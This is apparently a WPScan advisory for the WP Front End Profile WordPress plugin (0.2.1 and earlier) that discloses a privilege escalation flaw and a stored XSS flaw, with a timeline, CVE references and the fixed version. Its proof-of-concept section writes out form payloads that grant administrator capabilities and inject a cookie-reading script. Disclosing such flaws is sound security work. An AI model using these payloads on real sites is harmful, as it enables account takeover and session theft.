WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)



Description
It is possible to modify a POST request to overwrite user meta including 'wp_capabilities' and 'wp_user_level' which results in a privilege escalation vulnerability.

User input is not sanitised or escaped on output resulting in a stored XSS vulnerability.

Timeline:

2016-09-12: Vulnerability found
2016-09-12: Reported to vendor
2016-09-12: Vendor responded
2016-09-14: Vendor released a fixed version (0.2.2)
2016-09-14: Public disclosure
Proof of Concept
Privilege Escalation - Form data

profile[user_email]:subscriber@example.com
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/

Stored XSS - Form data

wpmark_tab[testing_field]:example"><script>alert(document.cookie)</script>
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/

Affects Plugin

fixed in version 0.2.2

References

CVE 2019-15110
CVE 2019-15111
URL https://plugins.trac.wordpress.org/changeset/1495896/wp-front-end-profile

Classification

Type MULTI

Miscellaneous

Submitter Phil Wylie
Submitter Website https://www.philwylie.co.uk/
Submitter Twitter mustardbees
Views 4771
Verified No
WPVDB ID 8620

Timeline

Publicly Published 2016-09-14 (about 3 years ago)
Added 2016-09-15 (about 3 years ago)
Last Updated 2019-08-21 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin